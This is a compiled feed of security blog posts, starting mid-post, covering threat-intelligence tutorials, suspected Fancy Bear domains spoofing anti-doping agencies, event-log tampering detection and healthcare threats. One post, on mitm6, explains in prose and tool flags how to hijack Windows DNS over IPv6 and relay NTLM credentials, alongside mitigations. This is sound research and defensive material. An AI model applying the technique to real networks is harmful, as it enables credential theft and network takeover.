It does not matter how the new group object (incident, in this example) is created. It could have been created manually through the Create Group wizard, or it could have been copied into my org from another source, such as the ThreatConnect Intelligence source. The Playbook will trigger on the new object and fill in the attribute automatically. Below we have multiple Playbooks to make this possible:



After the Playbooks are installed, configured, and set to Active status, any of the defined groups that are created will have the "TC ID Number" attribute populated.  

Moving forward, you now have a state where the TC ID Numbers are populated. You can pass these values to other users or even other systems for tracking purposes. For instance, your IR team might use an external ticketing system like ServiceNow to receive data about new investigations to begin. You could pass the weblink URL of our incidents in ThreatConnect to ServiceNow and perhaps use the TC ID Number as the display value for the link. Passing these values to ServiceNow is very straightforward with Playbooks, but beyond the scope of this blog.

Recall that I mentioned that our new attribute would be searchable. That's available to us now without any additional configuration. On the Browse page, we can select the Group types we want to browse, then in the Filters, we can select the attribute by name. Here are those three steps:



In this example, the Playbook is looking for a group with the identifier shown earlier (672522).  The result is:




Notice we have filtered on our specific attribute and value. We found the exact entry we were searching for, and as a final confirmation we can see the "TC ID Number" for the incident in question:




You can find an exact value. But you might want to view a range of values with your new attribute. This is possible, but you have to move from the Basic filters on the Browse page to the Advanced filters. But first, you need to configure the search as we did above, looking for our new attribute. This is essential because it will be carried over to the Advanced search and will show the database name of the new custom attribute. So to complete this step, configure the filters as before, and select the "Apply" button. It doesn't matter at this point whether you have results or not, we simply want to compose the search. Next, select the "Advanced" link at the top right of the page:



When we jump over to the Advanced search page, we see our search filters converted to the ThreatConnect Query Language (TQL)!




And in this example you see that the custom attribute which we called "TC ID Number" has the internal name of "attribute661". We can now take advantage of the features in TQL to add wildcards to our search. For example, I could ask it to show all group objects with a TC ID Number that starts with "672". I do this by using two features of TQL: the "like" operator, and the "%" wildcard character. By looking for " attribute661 like "672%" " , it will show any records where the attribute starts with "672":suspicious-infrastructure-threatconnect


Hmm.  Only one hit.  Let's open it up and look at any groups starting with a "6":




As you can see there are Threats, Incidents, Tasks, and Adversaries which all contain a value in the "TC ID Number" field starting with a "6".  

In summary, we started with a desire to show the assigned unique identifier for incidents, and ended up with a validated custom attribute which can be used across multiple group types, and is searchable with both the Basic and Advanced filters on the Browse page. And, you can pass the TC ID Number to other integrations through Playbooks if you choose to.

The post Playbook Fridays:  Using Playbooks to populate custom attributes appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Duping Doping Domains

Possible Fancy Bear Domains Spoofing Anti-Doping and Olympic Organizations

Update - 1/19/18

We recently identified two additional domains -- login-ukad[.]org[.]uk and adfs-ukad[.]org[.]uk -- which appear to spoof UK Anti-Doping. The domain uses the Domains4Bitcoins name server previously mentioned and, as of January 19 2018, is hosted on dedicated server at the IP 185.189.112[.]191. This IP address is in the same block as a previously identified IP that hosts the USADA-spoofing domain webmail-usada[.]org. SOA records for the login-ukad[.]org[.]uk domain indicate the domain was registered using the email address luciyvarn@protonmail[.]com. No other domains registered using that email address have been identified.

Using a DomainTools Reverse WHOIS search, we can identify that adfs-ukad[.]org[.]uk uses the same "Zender inc" organization name and "Vapaudenkatu 57" address string as login-ukad[.]org[.]uk. While this domain is not currently hosted on a dedicated server, it also appears to spoof UKAD. Given the consistency in spoofing UKAD, it suggests that the actor behind these domains may be engaged in a concerted effort against the UKAD or using their name to target others outside of the organization.

Like with the domains originally identified, we have no indication that these domains have been used in operations, but some of their registration and hosting information are consistent with previously identified Fancy Bear infrastructure. While these domains are not definitively attributable to Fancy Bear, given these consistencies they merit additional scrutiny. This information has been shared in our Common Community in Incident 20180119A: UKAD Spoofed Domains.

On 10 January, the Fancy Bears' HT - a faketivist most likely generated to release information garnered from Fancy Bear/APT28/Sofacy operations - released a post suggesting they had compromised emails from the International Olympic Committee (IOC). While we cannot verify the legitimacy or provenance of those leaked emails, ThreatConnect has identified spoofed domains imitating the World Anti-Doping Agency (WADA), the US Anti-Doping Agency (USADA), and the Olympic Council of Asia (OCASIA). These suspicious domains have consistencies with other previously identified Fancy Bear infrastructure and raise the question of a broader campaign against the upcoming 2018 winter games.


At this time, we cannot confirm whether these domains have been used maliciously nor definitively tie them to Fancy Bear without additional data. ThreatConnect has notified the spoofed organizations.


Fancy Bears' HT doing faketivist things



Way Back When...In 2016

We're old enough to remember when Russian threat actors hacked the World Anti-Doping Agency (WADA) in the summer of 2016 after WADA recommended Russian athletes be banned from the 2016 games in Rio due to a large-scale state-backed doping program. After that hack, over 40 athletes' personal data was leaked.

When the IOC banned Russia from the upcoming winter games in South Korea due to systematic doping, we thought the stage was set for more retaliatory hacks. If you're unfamiliar with said doping scandal check out the documentary Icarus on Netflix (@IcarusNetflix).


Concerted Effort to Spoof USADA

In the course of our ongoing efforts to monitor domains registered through registrars that Fancy Bear has shown a tendency to use, we recently identified the domain webmail-usada[.]org, which spoofs the USADA's legitimate domain. This domain was registered on December 21 2017 and uses the Domains4Bitcoins name server that Fancy Bear has previously used. Additionally, as of January 10, 2018, this domain is hosted on a dedicated server at the IP 185.189.112[.]242.


ThreatConnect's DNS Resolution History for webmail-usada[.]org


While the domain was registered using privacy protection, start of authority (SOA) records for the webmail-usada[.]org domain indicate the domain was registered using the email address jeryfisk@tuta[.]io.



Hurricane Electric SOA information on webmail-usada[.]org


Using Iris from our friends at DomainTools, we can identify that this email address was also recently used in the SOA records to register another USADA-spoofing domain usada[.]eu.




DomainTools Iris results for jeryfisk@tuta[.]io


This domain is not currently hosted. No other domains registered using that email address have been identified. However, given the consistency in spoofing USADA, it suggests that the actor behind these domains may be engaged in a concerted effort against the USADA or using their name to target others outside of the organization. This information has been shared in our Common Community in Incident 20180103B: USADA Spoofed Domains.


Guilt By Registrant Associations

We also identified a third domain, wada-adams[.]org, which spoofs the WADA's legitimate domain and Anti-Doping Administration and Management System (ADAMS). While this domain does not use a small or boutique name server that Fancy Bear has shown a tendency to use, and it is currently parked, it was registered on December 14, 2017 using the email address wadison@tuta[.]io.



Additional domain registered by wadison@tuta[.]io


This email address has only registered one other domain, networksolutions[.]pw, which uses the previously mentioned Domains4Bitcoins name server, and as of January 10, 2018, is hosted on dedicated server at the IP 23.227.207[.]182. The WADA-spoofing domain is currently parked; however, given the consistencies between wadison@tuta[.]io's networksolutions[.]pw domain and previously identified Fancy Bear infrastructure, it merits additional scrutiny. This information has been shared in our Common Community in Incident 20180103C: Domains Registered by


Olympic Council of Asia Spoofed Domain

Another interesting domain, ocaia[.]org, also recently came across our desks during Fancy Bear research. This domain was registered on December 25, 2017 and uses a THCServers name server -- another Fancy Bear favorite -- and appears to spoof OCASIA's legitimate domain ocasia[.]org. It should be noted that this spoofed domain is co-located on the IP 193.29.187[.]143 with about six other domains. Fancy Bear's domains often use dedicated servers, but given the subject and timing of this registration, defenders should also be on the lookout for this domain. This information has been shared in Incident 20180110B: Olympic Council of Asia Spoofed Domain.



We're going to reiterate something here: At the time of this blog's publishing, we don't know whether any of the infrastructure identified in this post is actually being used maliciously. But that's okay. In fact, we'd argue that if you're only concerned about what is known to be bad, you're going to be had.

While these domains are not definitively attributable to Fancy Bear, given these domains' consistencies and Fancy Bears' HT posts, they merit additional scrutiny. Furthermore, this incident highlights the importance of identifying activity that is consistent with adversaries' known infrastructure registration and hosting tactics. In doing so, organizations can incorporate a proactive approach to threat intelligence that may identify indicators like these that are associated with their adversaries before they are used against them.

The post Duping Doping Domains appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

mitm6 – compromising IPv4 networks via IPv6

While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described by in 2011 by Alex Waters from the Infosec institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network by setting up a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test since this rapidly destabilizes the network. Additionally the attack requires quite a few external packages and services to work. mitm6 is a tool which focusses on an easy to setup solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network’s regular operation. The result is a python script which requires almost no configuration to set up, and gets the attack running in seconds. When the attack is stopped, the network reverts itself to it’s previous state within minutes due to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts with listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attackers IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker’s IP as DNS server. Optionally it will periodically send Router Advertisment (RA) messages to alert client that there is an IPv6 network in place and that clients should request an IPv6 adddress via DHCPv6. This will in some cases speed up the attack but is not required for the attack to work, making it possible to execute this attack on networks that have protection against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as DNS server. Due to the preference of Windows regarding IP protocols, the IPv6 DNS server will be preferred to the IPv4 DNS server. The IPv6 DNS server will be used to query both for A (IPv4) and AAAA (IPv6) records.


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is getting the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. On the screenshot in step 1 you see the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the part we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection feature has been a much debated one, and one that has been abused by penetration testers for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which provides this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attackers server, and then prompt for authentication to access the WPAD file. This authentication was provided by default by Windows without requiring user interaction. This could provide the attacker with NTLM credentials from the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

In 2016 however, Microsoft published a security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can just reply with its own IP address (either IPv4 or IPv6 depending on what the victim’s machine asks for). This also works if the organization is already using a WPAD file (though in this case it will break any connections from reaching the internet).

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file we won’t request authentication, but instead provide it with a valid WPAD file where the attacker’s machine is set as a proxy. When the victim now runs any application that uses the Windows API to connect to the internet or simply starts browsing the web, it will use the attackers machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
Now when the victim connects to our “proxy” server, which we can identify by the use of the CONNECT HTTP verb, or the presence of a full URI after the GET verb, we reply with a HTTP 407 Proxy Authentication required. This is different from the HTTP code normally used to request authentication, HTTP 401.
IE/Edge and Chrome (which uses IEs settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim on services, access information on websites and shares, and if the victim has enough privileges, the attacker can even execute code on computers or even take over the entire Windows Domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the global idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients querying for a DHCPv6 server and make it impossible to take over the DNS server with the above described method.
For the WPAD exploit, the best solution is to disable the Proxy Auto detection via Group Policy. If your company uses a proxy configuration file internally (PAC file) it is recommended to explicitly configure the PAC url instead of relying on WPAD to detect it automatically.
While writing this blog, Google Project Zero also discovered vulnerabilities in WPAD, and their blog post mentions that disabling the WinHttpAutoProxySvc is the only reliable way that in their experience disabled WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Please Do Not Feed the Phish

How to Avoid Phishing Attacks

We've all heard the phishing attack stories that start with someone receiving an email that requests an urgent invoice review or password change, and ends with a data breach where personal information is compromised and money is lost. Although many of us may roll our eyes at the possibility of falling for such an obvious scam, we must acknowledge that if those tricks didn't work, malicious actors wouldn't keep trying. Sometimes, previously established filters and phishing mailboxes aren't enough. Vulnerabilities can still exist. At times, the content of an email can be troublesome. If a message asking for a money-wire transfer comes through looking urgent and legitimate enough, an unsuspecting employee might just take a requested action out of fear of repercussion. If an attachment looks innocent or a link seems harmless, it's inevitable that someone might succumb. PhishMe reports that over 90 percent of data breaches can be traced back to phishing emails (PhishMe, 2017).

Phishing is often the initial step of a larger attack. Advanced persistent threat (APT) activity often leverages phishing emails as an initial intrusion method. Phishing provides actors with the ability to target specific individuals or organizations unlike other methods such as strategic web compromises. Even as organizations put their defenses up against these attackers, the tactics continue to advance.

Another common tactic is to spoof URLs to appear similar to that of a legitimate organization. This makes a link look trustworthy at first glance. For example - a full URL might be[.]com, but unless the recipient looked closely and noticed that the domain was actually  badguys[.]com, they might be fooled. Another domain spoofing technique involves registering domains with missing characters or subtle spelling errors, such as www.threatcomect[.]com which replaces two "n" characters with one "m" character. At a glance, the domain looks like it might be the legitimate ThreatConnect website, but upon closer examination it is clear that the characters aren't quite right. This is a technique commonly used by many APTs including Fancy Bear, Deep Panda, and APT10.

Our ThreatConnect Research Team identified  Fancy Bear most likely was the threat actor responsible for the World Anti-Doping Agency (WADA) phishing incident that used this spoofing technique as well. Fancy Bear used domains such as wada-arna[.]org that were slightly misspelled in comparison to WADA's legitimate wada-ama[.]org. The phishing emails using links to these domains likely were used in an attempt to harvest recipients' credentials. By leveraging ThreatConnect and DomainTools, our team was able to identify an additional domain registered by the same individuals -- tas-cass[.]org -- that spoofs a domain for the Court of Arbitration for Sport, which works closely with WADA. . Taking a deeper look into spoofing and being on the lookout for domains spoofing your organization can help your team prevent and mitigate similar incidents in the future.

When it comes to phishing, early detection and speedy incident response are imperative to prevent data breaches. Doing so can then help to establish filters so the offending email can't make it to the intended recipients and phishing mailboxes to ingest the email into ThreatConnect for knowledge management, investigative, and research efforts. By proactively establishing these security measures, security teams can deter or monitor some of their threats that use these techniques.

However, email filters and phishing mailboxes aren't foolproof, and if malicious emails get through those defenses, recipients may have their guard down. Attackers are experts at creating phishing pages. In researching Fancy Bear activity targeting the DNC and the citizen journalism organization Bellingcat, ThreatConnect researchers identified the use of Google-spoofing phishing emails and credential harvesting pages. In incidents where the malicious actor is attempting to harvest target credentials, this emphasizes the importance of multi-factor authentication (MFA). In the worst case scenario where a credential harvesting campaign successfully compromises an individual's credentials, MFA mitigates the malicious actor's ability to login to the given account.

It isn't just large organizations that attackers go after. Small and medium sized companies aren't safe just because of a smaller revenue stream. Since phishing attacks are relatively easy attacks to launch, its recommended that even the smallest teams be on the lookout for suspicious emails. When it comes to prevention and mitigation, one of the strongest defenses any organization can enable is automation. Establish a system that can evaluate and flag potential threats as they come in, and your security team will have the time to craft an effective response to the most pertinent threats.

Phishing attacks could be considered a "classic" example of cybercrime as we approach an era where we're inundated with online danger. Although there is no one size fits all solution to preventing and mitigating phishing, security teams can save themselves time and stress by leveraging threat intelligence and establishing stronger filters. Teach your team to check URLs by hovering over them before clicking and always check with management before opening suspicious attachments. Spending that extra minute looking over any email you're just not sure about and training employees to know what to look for when scrutinizing messages could save your company a lot of time, energy, and money.

The post Please Do Not Feed the Phish appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Task Management

Playbook Fridays: Task Management
Simulate a task in ThreatConnect which can be modified to recur daily, weekly, or monthly  

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

As an analyst, you may have many recurring tasks that need to be  finished on a weekly or monthly basis and want to have all of your research and analysis tasks in one place (ThreatConnect). With this Playbook, you can simulate a recurring task in ThreatConnect, using a timer trigger which can be modified to create a task daily, weekly, or monthly.

The Playbook creates a task with the given name and a due date two days from the date on which the task is created.


After installing the playbook, change the "Run Weekly" app to run on the desired interval and at the desired time. Next, edit the "Set Variables" app. The "taskName" variable is used to set the name of the task as it will appear in ThreatConnect. The "dueDateOffset" variable is used to specify the amount of time between the date a new task is created and when it is due. Lastly, edit the "Create ThreatConnect Task" app and set the assignees, escalatees, and any other details about the recurring task which will be created.

Website Content Playbook

We've designed another Playbook to run weekly that requests website content, finds the hash of the website's content, retrieves the previous hash of the content from the playbook's datastore, and compares the hash of the current content with the hash of the previous content. If the hash of the current content is different from the hash of the previous content, an alert is sent.

Warning: Do not use this playbook to request the content of a malicious website. It should only be used to monitor the content of infrastructure which belongs to you.


After installing the playbook:

  1. Edit the "Run Playbook Weekly" app to specify how often and when you would like the app to run.
  2. Edit the "Set Variables" app and set the website you would like to monitor and the slack channel to which you would like to send notifications (and feel free to change the user agent too).
  3. Find all of the apps which have errors and fill in the missing fields (which include parameters like the ThreatConnect owner and slack API token).
  4. Turn it on and run the playbook!

Periodically capture the content of a website and send an alert if the content changes.






The post Playbook Fridays: Task Management appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Detection and recovery of NSA’s covered up tracks

Part of the NSA cyber weapon framework DanderSpritz is eventlogedit, a piece of software capable of removing individual lines from Windows Event Log files. Now that this tool is leaked and public, any criminal willing to remove its traces on a hacked computer can use it. Fox-IT has looked at the software and found a unique way to detect the use of it and to recover the removed event log entries.


A group known as The Shadow Brokers published a collection of software, which allegedly was part of the cyber weapon arsenal of the NSA. Part of the published software was the exploitation framework FuzzBunch and post-exploitation framework DanderSpritz. DanderSpritz is a full-blown command and control server, or listening post in NSA terms. It can be used to stealthy perform various actions on hacked computers, like finding and exfiltrating data or move laterally through the target network. Its GUI is built on Java and contains plugins written in Python. The plugins contain functionality in the framework to perform specific actions on the target machine. One specific plugin in DanderSpritz caught the eye of the Forensics & Incident Response team at Fox-IT: eventlogedit.

DanderSpritz with eventlogedit in action

Figure 1: DanderSpritz with eventlogedit in action


Normally, the content of Windows Event Log files is useful for system administrators troubleshooting system performance, security teams monitoring for incidents, and forensic and incident response teams investigating a breach or fraud case. A single event record can alert the security team or be the smoking gun during an investigation. Various other artefacts found on the target system usually corroborate findings in Windows Event Log files during an investigation, but a missing event record could reduce the chances of detection of an attack, or impede investigation.

Fox-IT has encountered event log editing by attackers before, but eventlogedit appeared to be more sophisticated. Investigative methods able to spot other methods of event log manipulation were not able to show indicators of edited log files after the use of eventlogedit. Using eventlogedit, an attacker is able to remove individual event log entries from the Security, Application and System log on a target Windows system. After forensic analysis of systems where eventlogedit was used, the Forensics & Incident Response team of Fox-IT was able to create a Python script to detect the use of eventlogedit and fully recover the removed event log entries by the attacker.

Analysing recovered event records, deleted by an attacker, gives great insight into what an attacker wanted to hide and ultimately wanted to achieve. This provides security and response teams with more prevention and detection possibilities, and investigative leads during an investigation.

Before (back) and after (front) eventlogedit

Figure 2: Before (back) and after (front) eventlogedit

eventlogedit in use

Starting with Windows Vista, Windows Event Log files are stored in the Windows XML Eventlog format. The files on the disk have the file extension .evtx and are stored in the folder \Windows\System32\winevt\Logs\ on the system disk, by default. The file structure consists of a file header followed by one or more chunks. A chunk itself starts with a header followed by one or more individual event records. The event record starts with a signature, followed by record size, record number, timestamp, the actual event message, and the record size once again. The event message is encoded in a proprietary binary XML format, binXml. BinXml is a token representation of text XML.

Fox-IT discovered that when eventlogedit is used, the to-be-removed event record itself isn’t edited or removed at all: the record is only unreferenced. This is achieved by manipulation of the record header of the preceding record. Eventlogedit adds the size of the to-be-removed-record to the size of the previous record, thereby merging the two records. The removed record including its record header is now simply seen as excess data of the preceding record. In Figure 3 this is illustrated. You might think that an event viewer would show this excess or garbage data, but no. Apparently, all tested viewers parse the record binXml message data until the first end-tag and then move on to the next record. Tested viewers include Windows Event Viewer as well as various other forensic event log viewers and parsers. None of them was able to show a removed record.

Untouched event records (left) and deleted event record (right)

Figure 3: Untouched event records (left) and deleted event record (right). Note: not all field are displayed here.

Merely changing the record size would not be enough to prevent detection: various fields in the file and chunk header need to be changed. Eventlogedit makes sure that all following event records numbers are renumbered and that checksums are recalculated in both the file and chunk header. Doing so, it makes sure that obvious anomalies like missing record numbers or checksum errors are prevented and will not raise an alarm at the system user, or the security department.

Organizations which send event log records on the fly to a central log server (e.g. a SIEM), should be able to see the removed record on their server. However, an advanced attacker will most likely compromise the log server before continuing the operation on the target computer.

Recovering removed records

As eventlogedit leaves the removed record and record header in its original state, their content can be recovered. This allows the full recovery of all the data that was originally in the record, including record number, event id, timestamps, and event message.

Fox-IT’s Forensics & Incident Response department has created a Python script that finds and exports any removed event log records from an event log file. This script also works in the scenario when consecutive event records have been removed, when the first record of the file is removed, or the first record of a chunk is removed. In Figure 4 an example is shown.

Recovering removed event records

Figure 4: Recovering removed event records

We have decided to open source the script. It can be found on our GitHub and works like this:

$ python -h
usage: [-h] -i INPUT_PATH [-o OUTPUT_PATH]
 [-e EXPORT_PATH] - Parse evtx files and detect the use of the danderspritz
module that deletes evtx entries

optional arguments:
 -h, --help show this help message and exit
 Path to evtx file
 Path to corrected evtx file
 Path to location to store exported xml records

The script requires the python-evtx library from Willi Ballenthin.

Additionally, we have created an easy to use standalone executable for Windows systems which can be found on our GitHub as well.


md5    c07f6a5b27e6db7b43a84c724a2f61be 
sha1   6d10d80cb8643d780d0f1fa84891a2447f34627c
sha256 6c0f3cd832871ba4eb0ac93e241811fd982f1804d8009d1e50af948858d75f6b



To detect if the NSA or someone else has used this to cover up his tracks using the eventlogedit tool on your systems, it is recommended to use the script on event log files from your Windows servers and computers. As the NSA very likely changed their tools after the leaks, it might be farfetched to detect their current operations with this script. But you might find traces of it in older event log files. It is recommended to run the script on archived event log files from back-ups or central log servers.

If you find traces of eventlogedit, and would like assistance in analysis and remediation for a possible breach, feel free to contact us. Our Forensics & Incident Response department during business hours or FoxCERT 24/7.

Wouter Jansen
Fox-IT Forensics & Incident Response

ThreatConnect Provides a Report on Healthcare and Medical Industry Threats

Learn about the threats and how to protect your healthcare organization


Medical and health organizations, which include organizations operating in the pharmaceutical sector, face a variety of threats that are inherent to the services they provide and the data they safeguard. Within medical and health verticals the risks associated with compromise are often significantly augmented as patient care and personal information are at stake. This report highlights notable threats to those organizations and corresponding intelligence within the ThreatConnect platform that may facilitate those organizations' defensive efforts.

Ransomware - this was the most notable malware threat for healthcare and medical organizations in 2016 after Hollywood Presbyterian paid $17,000 to a hacker that had successfully debilitated their services using Locky. The use of ransomware continued throughout 2016 and 2017, many attacks of which came against other medical/health organizations. These organizations are viable targets to ransomware attackers because there is significant pressure to re-enable medical services after they are taken offline. Several other ransomware variants popped up during 2016 and 2017 including SamSam, TeslaCrypt, NotPetya, and WannaCry.

Chinese Advanced Persistent Threats (APTs) - Deep Panda, a Chinese APT, has been associated with attacks against medical and health organizations. Notably this includes the 2015 Anthem BCBS breaches as well as 2015 attacks against the pharmaceutical sector. Deep Panda's interest in healthcare organizations likely stems from a motivation to garner intelligence on US government individuals (Anthem BCBS provides insurance to a majority of federal employees participating in the Federal Employee Health Benefits program). Deep Panda's interest in pharmaceutical and medical device organizations likely is the result of a goal to collect intelligence on intellectual property to enable domestic production. Other Chinese APTs that have been associated with attacks on the healthcare vertical include Wekby (Dynamite Panda) and Suckfly. Identified and openly reported Chinese APT activity targeting US organizations has decreased since the 2015 Rose Garden agreement on cybertheft between the US and China; however, recent Chinese operations overseas have been identified and knowledge of these groups and previous operations may facilitate future defensive efforts.


Generally, medical and health organizations have the following considerations and data holdings that they must incorporate into their risk assessments, defensive strategies, and intelligence requirements:

  1. Personally identifiable information (PII) and personal medical information (PMI)
  2. Intellectual property (IP), notably in pharmaceutical and biomedical industries
  3. Continuity of operations
  4. Medical devices

Example Intelligence Requirements

Intelligence requirements define topics on which organizations should focus intelligence collection, processing, analysis, and production. Intelligence requirements can be used to drive both strategic and tactical defense efforts, efficiently drive procurement, and identify gaps in intelligence collection. ThreatConnect provides the following general intelligence requirements for organizations in the medical and health sector to enable organizations' intelligence-related discussions and focus research efforts:

  • Which threats -- including nation state, criminal, and hacktivist groups, specific adversaries, or malware -- target our organization?
  • What types of notable attacks has our organization experienced before?
  • Which advanced persistent threats (APTs) have specifically targeted organizations within the medical and health sectors?
    • How do these APTs typically conduct operations against their targets?
    • What specific tactics do these APTs employ prior to conducting operations against their targets?
    • What are these APTs' motivations with respect to their operations against medical and health organizations?
  • What types or variants of malware have been used to steal, delete, or ransom PII, PMI, or IP specific to medical and health verticals?
    • What ransomware has been used in attacks against the medical and health verticals?
      • How does this ransomware work and how does it ransom the targeted data?
  • What vulnerabilities have been identified in software commonly used at our organization or that would enable access to pertinent data holdings?
  • What vulnerabilities have been identified in medical devices that we develop or employ?


In The Platform

Below, we identify notable Threats, Incidents/Campaigns, Tags, and Communities within the ThreatConnect platform that are pertinent to medical and health organizations. The links and information provided below are from our Common Community; however, our ThreatConnect Intelligence source has more significant, enriched, and timely information on these threats and others pertinent to the medical and health sectors.


Threats capture both nation state and criminal threat groups, as well as malware groups that have been used in multiple operations.

Deep Panda / Black Vine - Chinese APT Associated with the 2015 Anthem/BCBS breaches and attempts against pharmaceutical companies

APT10 / Stone Panda / menuPass - Chinese APT associated with 2016-2017 activity targeting European and Japanese organizations in a variety of sectors, including the pharmaceutical industry.



ThreatConnect entry for APT10 / Stone Panda / menuPass.


Suckfly - Chinese APT that has primarily targeted organizations in India, including a US healthcare provider's business unit
Locky - Ransomware variant that was initially identified in February 2016, has been leveraged in successful attacks, notably against hospitals and the healthcare sector.



ThreatConnect entry for Locky


SamSam -  This ransomware family seems to be distributed via compromising servers and using them as a foothold to move laterally through the network to compromise additional machines which are then held for ransom.

Nymaim - Nymaim is a two-stage malware dropper. It usually infiltrates computers through exploit kits and then executes the second stage of its payload once it is on the machine, effectively using two executables for the infection routine.


Incidents capture individual attacks emanating from a given group or using specific malware. Incident may also be used to capture research efforts into a group or malware. Campaigns generally are a collection of multiple incidents that are associated with a group or malware.

20170824E: Locky Diablo6

20170627B: PetrWrap / Petya / NotPetya Indicators

20170512C: Wanna Decryptor

20170407B: PwC Report on Operation Cloud Hopper


Tags are commonly used within the ThreatConnect platform to specify targeted sectors, types of malware or tactics used, or attributed threats for identified activity or groups. ThreatConnect users can also follow tags to be alerted to new activity that is pertinent to their interests.


The following communities and sources may be pertinent for organizations looking for intelligence on activity targeting medical and health verticals. These communities also facilitate the sharing of intelligence with other members that have similar intelligence requirements.

    • Medical and Health Community - Community for sharing incidents/intelligence with other members of the medical and health community.
    • ThreatConnect Intelligence - Incidents from ThreatConnect Research as well as profiles on significant threats to the Medical/Health sector.
    • Common Community - ThreatConnect's open community with wider access that houses intelligence on a variety of threats. 
